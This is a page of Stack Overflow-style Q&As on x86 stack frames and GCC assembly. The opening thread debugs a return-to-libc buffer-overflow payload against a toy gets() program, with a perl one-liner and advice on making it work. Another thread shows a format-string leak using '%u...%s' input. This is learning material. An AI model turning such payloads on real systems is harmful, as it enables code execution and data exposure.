I'm having problems with return-to-libc exploit. The problem is that nothing happens, but no segmentation fault (and yes I'm actually overflowing the stack).
This is my program:
int main(int argc, char **argv) {
char array[512];
gets(array);
}
I'm using gets instead of strcopy, because my addresses start with 0x00 and strcpy thinks it's the end of a string, so I can't use it.
Here are the addresses that I need:
$ gdb main core
(gdb) p system
$1 = {<text variable, no debug info>} 0x179680 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x16f6e0 <exit>
(gdb) x/s 0xbffffe3f
0xbffffe3f: "/bin/sh"
When inputing the right sequence, this happens:
eleanor#eleanor32:~/testing/root$ perl -e 'print "\x41"x516 . "\x80\x96\x17\x00" . "\xe0\xf6\x16\x00" . "\x3f\xfe\xff\xbf"' | ./main
eleanor#eleanor32:~/testing/root$
so nothing.
But if I enter 520 'A's (0x41), then the EIP is overflown with 'A's. If there's 516 'A', nothing happens but EIP contains the system address, following the exit address, following the /bin/sh pointer.
Why nothing happened?
Let's do some asm before:
Code
$ cat gets.c
int main(int argc, char **argv) {
char array[512];
gets(array);
}
Asm
$ gcc gets.c -o getsA.s -S -fverbose-asm
$ cat gets.s
....
.globl main
.type main, #function
main:
leal 4(%esp), %ecx #,
andl $-16, %esp #,
pushl -4(%ecx) # (1)
pushl %ebp # 2
movl %esp, %ebp #,
pushl %ecx # 3
subl $516, %esp #,
leal -516(%ebp), %eax #, tmp60
movl %eax, (%esp) # tmp60,
call gets # << break here
addl $516, %esp #, << or here to see the stack picture
popl %ecx # (3')
popl %ebp # (2')
leal -4(%ecx), %esp # (1')
ret
.size main, .-main
The prologue and epilogue (these are with alignment code) is described in detail here Understanding the purpose of some assembly statements
Stack layout:
(char) array[0]
...
(char) array[511]
(32bit) $ecx - pushed by 3 - it was the address on the stack of the eip which main will return to
(32bit) $ebp - pushed by 2
(32bit) $esp - pushed by 1 - change the $esp to the original value
So, if you want to change a return address of main, you should not to change address in stack which will be used by ret, but also to repeat the values saved in stack by (1),(2),(3) pushes. Or you can embed a new return address in the array itself and overwrite only (3) by the your new stack address+4. (use 516 byte string)
I suggest you use this source code to hack it:
$ cat getss.c
f()
{
char array[512];
gets(array);
}
int main(int argc, char **argv) {
f();
}
because f have no problems with stack realignement
.globl f
.type f, #function
f:
pushl %ebp #
movl %esp, %ebp #,
subl $520, %esp #,
leal -512(%ebp), %eax #, tmp59
movl %eax, (%esp) # tmp59,
call gets #
leave
ret
.size f, .-f
Stack layout for f():
(char) array[0]
...
(char) array[511]
(32bit) old ebp
(32bit) return address
Breakpoint at ret instruction in f() with 520 bytes of "A"
(gdb) x/w $sp
0xXXXXXa3c: 0x41414141
Related
I want to make a function in assembler to be called from c that will write a byte(char) to the file. Here is how function should look in c:
void writebyte (FILE *f, char b)
{
fwrite(&b, 1, 1, f);
}
And here is the code that will call it:
#include <stdio.h>
extern void writebyte(FILE *, char);
int main(void) {
FILE *f = fopen("test.txt", "w");
writebyte(f, 1);
fclose(f);
return 0;
}
So far I came up with following assembler code:
.global writebyte
writebyte:
pushl %ebp
movl %esp, %ebp #standard params
pushl 12(%ebp) # pushing byte to the stack
pushl $1
pushl $1
pushl 8(%ebp) #file to write
call fwrite
popl %ebp
ret
I keep getting from gdb:
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffa9702c in ?? ()
How do I write such a function in assembly?
EDIT: I am using Ubuntu 16.04
According to cdecl convention, you should push the arguments in reverse order. So f should go first and b should go last. Also the stack should be cleaned up by the caller after calling fwrite().
As noted in the comments, b will be received as value, but we need to pass it to fwrite() as pointer. The pointer will be equal to the value of ebp + 12.
This seems to work for me:
.global writebyte
writebyte:
//create new stack frame
pushl %ebp
movl %esp, %ebp
//push the four arguments to stack (in reverse order)
pushl 8(%ebp)
pushl $1
pushl $1
//get pointer of "b" argument (%ebp+12) and move it to %eax
leal 12(%ebp), %eax
pushl %eax
//call fwrite()
call fwrite
//remove arguments from stack and pop %ebp
leave
ret
I was just learning about format string vulnerabilities that makes me ask this question
Consider the following simple program:
#include<stdio.h>
void main(int argc, char **argv)
{
char *s="SomeString";
printf(argv[1]);
}
Now clearly, this code is vulnerable to a format String vulnerability. I.e. when the command line argument is %s, then the value SomeString is printed since printf pops the stack once.
What I dont understand is the structure of the stack when printf is called
In my head I imagine the stack to be as follows:
grows from left to right ----->
main() ---> printf()-->
RET to libc_main | address of 's' | current registers| ret ptr to main | ptr to format string|
if this is the case, how does inputting %s to the program, cause the value of s to be popped ?
(OR) If I am totally wrong about the stack structure , please correct me
The stack contents depends a lot on the following:
the CPU
the compiler
the calling conventions (i.e. how parameters are passed in the registers and on the stack)
the code optimizations performed by the compiler
This is what I get by compiling your tiny program with x86 mingw using gcc stk.c -S -o stk.s:
.file "stk.c"
.def ___main; .scl 2; .type 32; .endef
.section .rdata,"dr"
LC0:
.ascii "SomeString\0"
.text
.globl _main
.def _main; .scl 2; .type 32; .endef
_main:
LFB6:
.cfi_startproc
pushl %ebp
.cfi_def_cfa_offset 8
.cfi_offset 5, -8
movl %esp, %ebp
.cfi_def_cfa_register 5
andl $-16, %esp
subl $32, %esp
call ___main
movl $LC0, 28(%esp)
movl 12(%ebp), %eax
addl $4, %eax
movl (%eax), %eax
movl %eax, (%esp)
call _printf
leave
.cfi_restore 5
.cfi_def_cfa 4, 4
ret
.cfi_endproc
LFE6:
.def _printf; .scl 2; .type 32; .endef
And this is what I get using gcc stk.c -S -O2 -o stk.s, that is, with optimizations enabled:
.file "stk.c"
.def ___main; .scl 2; .type 32; .endef
.section .text.startup,"x"
.p2align 2,,3
.globl _main
.def _main; .scl 2; .type 32; .endef
_main:
LFB7:
.cfi_startproc
pushl %ebp
.cfi_def_cfa_offset 8
.cfi_offset 5, -8
movl %esp, %ebp
.cfi_def_cfa_register 5
andl $-16, %esp
subl $16, %esp
call ___main
movl 12(%ebp), %eax
movl 4(%eax), %eax
movl %eax, (%esp)
call _printf
leave
.cfi_restore 5
.cfi_def_cfa 4, 4
ret
.cfi_endproc
LFE7:
.def _printf; .scl 2; .type 32; .endef
As you can see, in the latter case there's no pointer to "SomeString" on the stack. In fact, the string isn't even present in the compiled code.
In this simple code there are no registers saved on the stack because there aren't any variables allocated to registers that need to be preserved across the call to printf().
So, the only things you get on the stack here are the string pointer (optionally), unused space due to stack alignment (andl $-16, %esp + subl $32, %esp align the stack and allocate space for local variables, none here), the printf()'s parameter, the return address for returning from printf() back to main().
In the former case the pointer to "SomeString" and the printf()'s parameter (value of argv[1]) are quite far away from one another:
movl $LC0, 28(%esp) ; address of "SomeString" is at esp+28
movl 12(%ebp), %eax
addl $4, %eax
movl (%eax), %eax
movl %eax, (%esp) ; address of a copy of argv[1] is at esp
call _printf
To make the two addresses stored one right after the other on the stack, if that's what you want, you'd need to play with the code, compilation/optimization options or use a different compiler.
Or you could supply a format string in argv[1] such that printf() would reach it. You could, for example, include a number of fake parameters in the format string.
For example, if I compile this piece of code using gcc stk.c -o stk.exe and run it as stk.exe %u%u%u%u%u%u%s, I'll get the following output from it:
4200532268676042006264200532880015253SomeString
All of this is pretty hacky and it's not trivial to make it work right.
On x86 the stack on a function call could look something like:
: :
+--------------+
: alignment :
+--------------+
12(%ebp) | arg2 |
+--------------+
8(%ebp) | arg1 |
+--------------+
4(%ebp) | ret | -----> return address
+--------------+
(%ebp) | ebp | -----> previous ebp value
+--------------+
-4(%ebp) | local1 | -----> local vars, sometimes they can overflow ;-)
+--------------+
: alignment :
+--------------+
: :
If you used -fomit-frame-pointer ebp would not be saved on the stack. At different optimization levels some variables may disappear (be optimized out), ...
Other ABIs store function arguments on registers, instead of saving them on the stack. Later, before calling another function, live registers may spill into the stack.
C code:
#include <stdio.h>
main() {
int i;
for (i = 0; i < 10; i++) {
printf("%s\n", "hello");
}
}
ASM:
.file "simple_loop.c"
.section .rodata
.LC0:
.string "hello"
.text
.globl main
.type main, #function
main:
.LFB0:
.cfi_startproc
pushl %ebp # push ebp onto stack
.cfi_def_cfa_offset 8
.cfi_offset 5, -8
movl %esp, %ebp # setup base pointer or stack ?
.cfi_def_cfa_register 5
andl $-16, %esp # ?
subl $32, %esp # ?
movl $0, 28(%esp) # i = 0
jmp .L2
.L3:
movl $.LC0, (%esp) # point stack pointer to "hello" ?
call puts # print "hello"
addl $1, 28(%esp) # i++
.L2:
cmpl $9, 28(%esp) # if i < 9
jle .L3 # goto l3
leave
.cfi_restore 5
.cfi_def_cfa 4, 4
ret
So I am trying to improve my understanding of x86 assembly code. For the above code, I marked off what I believe I understand. As for the question marked content, could someone share some light? Also, if any of my comments are off, please let me know.
andl $-16, %esp # ?
subl $32, %esp # ?
This reserves some space on the stack. First, the andl instruction rounds the %esp register down to the next lowest multiple of 16 bytes (exercise: find out what the binary value of -16 is to see why). Then, the subl instruction moves the stack pointer down a bit further (32 bytes), reserving some more space (which it will use next). I suspect this rounding is done so that access through the %esp register is slightly more efficient (but you'd have to inspect your processor data sheets to figure out why).
movl $.LC0, (%esp) # point stack pointer to "hello" ?
This places the address of the string "hello" onto the stack (this instruction doesn't change the value of the %esp register itself). Apparently your compiler considers it more efficient to move data onto the stack directly, rather than to use the push instruction.
im just curious about the following example
#include<stdio.h>
int test();
int test(){
// int a = 5;
// int b = a+1;
return ;
}
int main(){
printf("%u\n",test());
return 0;
}
i compiled it with 'gcc -Wall -o semicolon semicolon.c' to create an executable
and 'gcc -Wall -S semicolon.c' to get the assembler code which is:
.file "semicolon.c"
.text
.globl test
.type test, #function
test:
pushl %ebp
movl %esp, %ebp
subl $4, %esp
leave
ret
.size test, .-test
.section .rodata
.LC0:
.string "%u\n"
.text
.globl main
.type main, #function
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
subl $20, %esp
call test
movl %eax, 4(%esp)
movl $.LC0, (%esp)
call printf
movl $0, %eax
addl $20, %esp
popl %ecx
popl %ebp
leal -4(%ecx), %esp
ret
.size main, .-main
.ident "GCC: (Ubuntu 4.3.3-5ubuntu4) 4.3.3"
.section .note.GNU-stack,"",#progbits
since im not such an assembler pro, i only know that printf prints what is in eax
but i dont fully understand what 'movl %eax, 4(%esp)' means which i assume fills eax before calling test
but what is the value then? what means 4(%esp) and what does the value of esp mean?
if i uncomment the lines in test() printf prints 6 - which is written in eax ^^
Your assembly language annotated:
test:
pushl %ebp # Save the frame pointer
movl %esp, %ebp # Get the new frame pointer.
subl $4, %esp # Allocate some local space on the stack.
leave # Restore the old frame pointer/stack
ret
Note that nothing in test touches eax.
.size test, .-test
.section .rodata
.LC0:
.string "%u\n"
.text
.globl main
.type main, #function
main:
leal 4(%esp), %ecx # Point past the return address.
andl $-16, %esp # Align the stack.
pushl -4(%ecx) # Push the return address.
pushl %ebp # Save the frame pointer
movl %esp, %ebp # Get the new frame pointer.
pushl %ecx # save the old top of stack.
subl $20, %esp # Allocate some local space (for printf parameters and ?).
call test # Call test.
Note that at this point, nothing has modified eax. Whatever came into main is still here.
movl %eax, 4(%esp) # Save eax as a printf argument.
movl $.LC0, (%esp) # Send the format string.
call printf # Duh.
movl $0, %eax # Return zero from main.
addl $20, %esp # Deallocate local space.
popl %ecx # Restore the old top of stack.
popl %ebp # And the old frame pointer.
leal -4(%ecx), %esp # Fix the stack pointer,
ret
So, what gets printed out is whatever came in to main. As others have pointed out it is undefined: It depends on what the startup code (or the OS) has done to eax previously.
The semicolon has no return value, what you have there is an "empty return", like the one used to return from void functions - so the function doesn't return anything.
This actually causes a warning when compiling:
warning: `return' with no value, in function returning non-void
And I don't see anything placed in eax before calling test.
About 4(%esp), this means taking the value from the stack pointer (esp) + 4. I.e. the one-before-last word on the stack.
The return value of an int function is passed in the EAX register. The test function does not set the EAX register because no return value is given. The result is therefore undefined.
A semicolon indeed has no value.
I think the correct answer is that a return <nothing> for an int function is an error, or at least has undefined behavor. That's why compiling this with -Wall yields
semi.c: In function ‘test’:
semi.c:6: warning: ‘return’ with no value, in function returning non-void
As for what the %4,esp holds... it's a location on the stack where nothing was (intentionally) stored, so it will likely return whatever junk is found at that location. This could be the last expression evaluated to variables in the function (as in your example) or something completely different. This is what "undefined" is all about. :)
I was just playing with the call stack, trying to change the return address of a function etc, and wound up writing this program in C:
#include<stdio.h>
void trace(int);
void func3(int);
void func2(int);
void func1(int);
int main(){
int a = 0xAAAA1111;
func1(0xFCFCFC01);
return 0;
}
void func1(int a){
int loc = 0xBBBB1111;
func2(0xFCFCFC02);
}
void func2(int a){
int loc1 = 0xCCCC1111;
int loc2 = 0xCCCC2222;
func3(0xFCFCFC03);
}
void func3(int a){
int loc1 = 0xDDDD1111;
int loc2 = 0xDDDD2222;
int loc3 = 0xDDDD3333;
trace(0xFCFCFC04);
}
void trace(int a){
int loc = 0xEEEE1111;
int *ptr = &loc;
do {
printf("0x%08X : %08X\n", ptr, *ptr, *ptr);
} while(*(ptr++) != 0xAAAA1111);
}
(sorry for the length)
This produced the following output (with comments that I added):
0xBF8144D4 : EEEE1111 //local int in trace
0xBF8144D8 : BF8144F8 //beginning of trace stack frame
0xBF8144DC : 0804845A //return address for trace to func3
0xBF8144E0 : FCFCFC04 //int passed to trace
0xBF8144E4 : 08048230 //(possibly) uninitialized padding
0xBF8144E8 : 00000000 //padding
0xBF8144EC : DDDD3333 //local int in func3
0xBF8144F0 : DDDD2222 //local int in func3
0xBF8144F4 : DDDD1111 //local int in func3
0xBF8144F8 : BF814518 //beginning of func3 stack frame
0xBF8144FC : 08048431 //return address for func3 to func2
0xBF814500 : FCFCFC03 //parameter passed to func3
0xBF814504 : 00000000 //padding
0xBF814508 : 00000000 //padding
0xBF81450C : 00000000 //padding
0xBF814510 : CCCC2222 //local int in func2
0xBF814514 : CCCC1111 //local int in func2
0xBF814518 : BF814538 //beginning of func2 stack frame
0xBF81451C : 0804840F //return address for func2 to func1
0xBF814520 : FCFCFC02 //parameter passed to func2
0xBF814524 : 00000000 //padding
0xBF814528 : BF816728 //uninitialized padding
0xBF81452C : B7DF3F4E //uninitialized padding
0xBF814530 : B7EA61D9 //uninitialized padding
0xBF814534 : BBBB1111 //local int in func1
0xBF814538 : BF814558 //beginning of func1 stack frame
0xBF81453C : 080483E8 //return address for func1 to main
0xBF814540 : FCFCFC01 //parameter passed to func1
0xBF814544 : 08049FF4 //(maybe) padding
0xBF814548 : BF814568 //(maybe) padding
0xBF81454C : 080484D9 //(maybe) padding
0xBF814550 : AAAA1111 //local int in main
I was wondering if anybody could fill me in on the blank spots here... I'm running Ubuntu linux compiling with gcc 4.3.3 (on an x86 -- AMD Turion 64)
What are the 0804... numbers? What's the third address up from the bottom? Is that the return address for main? If so, why is it out of order compared to the rest of the stack?
The 0x0804 numbers are return addresses, or pointers to code/data or something, while the 0xBF814 numbers are stack pointers
What's this:
0xBF814524 : 00000000 //padding?
0xBF814528 : BF816728 //I have no idea
0xBF81452C : B7DF3F4E //????
0xBF814530 : B7EA61D9 //????
seen just after the local int in func1?
Okay I have my stack dump almost completely filled in.
It looks like the the compiler wants to have the parameters pushed onto the stack starting at a 0x.......0 address, and everything between the local variables from the function before and the first parameter of the function being called seems to be padding (whether 0x00000000 or some uninitialized value). Some of them I'm unsure about because they look like code/data segment pointers, but I can't see them being used in the code: they're just there when the stack pointer gets reduced.
and I know it's a HUGE nono to touch the call stack in any kind of project, but that's okay. It's fun, right?
also
Greg wants to see the assembly,
here it is
.file "stack.c"
.text
.globl main
.type main, #function
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
subl $20, %esp
movl $-1431695087, -8(%ebp)
movl $-50529279, (%esp)
call func1
movl $0, %eax
addl $20, %esp
popl %ecx
popl %ebp
leal -4(%ecx), %esp
ret
.size main, .-main
.globl func1
.type func1, #function
func1:
pushl %ebp
movl %esp, %ebp
subl $24, %esp
movl $-1145368303, -4(%ebp)
movl $-50529278, (%esp)
call func2
leave
ret
.size func1, .-func1
.globl func2
.type func2, #function
func2:
pushl %ebp
movl %esp, %ebp
subl $24, %esp
movl $-859041519, -4(%ebp)
movl $-859037150, -8(%ebp)
movl $-50529277, (%esp)
call func3
leave
ret
.size func2, .-func2
.globl func3
.type func3, #function
func3:
pushl %ebp
movl %esp, %ebp
subl $24, %esp
movl $-572714735, -4(%ebp)
movl $-572710366, -8(%ebp)
movl $-572705997, -12(%ebp)
movl $-50529276, (%esp)
call trace
leave
ret
.size func3, .-func3
.section .rodata
.LC0:
.string "0x%08X : %08X\n"
.text
.globl trace
.type trace, #function
trace:
pushl %ebp
movl %esp, %ebp
subl $40, %esp
movl $-286387951, -4(%ebp)
leal -4(%ebp), %eax
movl %eax, -8(%ebp)
.L10:
movl -8(%ebp), %eax
movl (%eax), %edx
movl -8(%ebp), %eax
movl (%eax), %eax
movl %edx, 12(%esp)
movl %eax, 8(%esp)
movl -8(%ebp), %eax
movl %eax, 4(%esp)
movl $.LC0, (%esp)
call printf
movl -8(%ebp), %eax
movl (%eax), %eax
cmpl $-1431695087, %eax
setne %al
addl $4, -8(%ebp)
testb %al, %al
jne .L10
leave
ret
.size trace, .-trace
.ident "GCC: (Ubuntu 4.3.3-5ubuntu4) 4.3.3"
.section .note.GNU-stack,"",#progbits
Inspecting the stack like this seems like one step too far away. I might suggest loading your program in a debugger, switching to the assembly language view, and single stepping through every machine instruction. Understanding of the CPU stack necessarily requires an understanding of the machine instructions operating on it, and this will be a more direct way to see what's going on.
As others mentioned, the structure of the stack is also highly dependent on the processor architecture you're working with.
Most likely those are stack canaries. Your compiler adds code to push additional data to the stack and read it back afterwards to detect stack overflows.
I'm guessing those values starting with 0x0804 are addresses in your program's code segement (like return addresses for function calls). The ones starting with 0xBF814 that you've labeled as return addresses are addresses on the stack -- data, not code. I'm guessing they're probably frame pointers.
As already pointed out, the 0xBF... are frame pointers and 0x08... return addresses.
The padding is due to alignment issues. Other unrecognized values are also padding as the stack is not initalized to zero or any other value. Uninitialized variables and unused padding space will contain whatever bytes are in those memory locations.
The 0xBF... addresses will be links to the previous stack frame:
0xBF8144D8 : BF8144F8 //return address for trace
0xBF8144DC : 0804845A //
0xBF8144F8 : BF814518 //return address for func3
0xBF8144FC : 08048431 //????
0xBF814518 : BF814538 //return address for func2?
0xBF81451C : 0804840F //????
0xBF814538 : BF814558 //return address for func1
0xBF81453C : 080483E8 //????
The 0x08... addresses will be the addresses of the code to return to in each case.
I can't speak for the other stuff on the stack; you would have to step through the assembly language and see exactly what it is doing. I guess that it is aligning the start of each frame to a specific alignment so that __attribute__((align)) (or whatever it's called these days...) works.
The compiler uses EBP to store the frame's base address. It's been a while so I looked at this, so I may get the details a bit wrong, but the idea is like this.
You have three steps when calling a function:
The caller pushes the function's parameters onto the stack.
The caller uses the call instruction, which pushes the return address onto the stack, and jumps to the new function.
The called function pushes EBP onto the stack, and copies ESP into EBP:
(Note: well behaved functions will also push all the GPRs onto the stack with PUSHAD)
push EBP
mov EBP, ESP
When the function returns it:
pops EBP
executes the ret instruction, which pops off the return address and jumps there.
pop EBP
ret
The question is, why is EBP pushed, and why does ESP get copied into it?
When you enter the function ESP points to the lowest point on the stack for this function. Any variables you declare on the stack can be accessed as [ESP + offset_to_variable]. This is easy! But note that ESP must always point to the top of the stack, so when you declare a new variable on the stack, ESP changes. Now [ESP + offset_to_variable] isn't so great, because you have to remember what ESP was at the time the variable was allocated.
Instead of doing that, the first thing the function needs to do is to copy ESP into EBP. EBP won't change during the life of the function, so you can access all variables using `[EBP + offset_to_variable]. But now you have another problem, because if the called functions calls another function, EBP will be overwritten. That's why before copying EBP it needs to be saved onto the stack, so that it can be restored before the returning to the calling function.
Is this a debug or release build? I'd expect some padding with the debug builds for detecting Stack Overflows.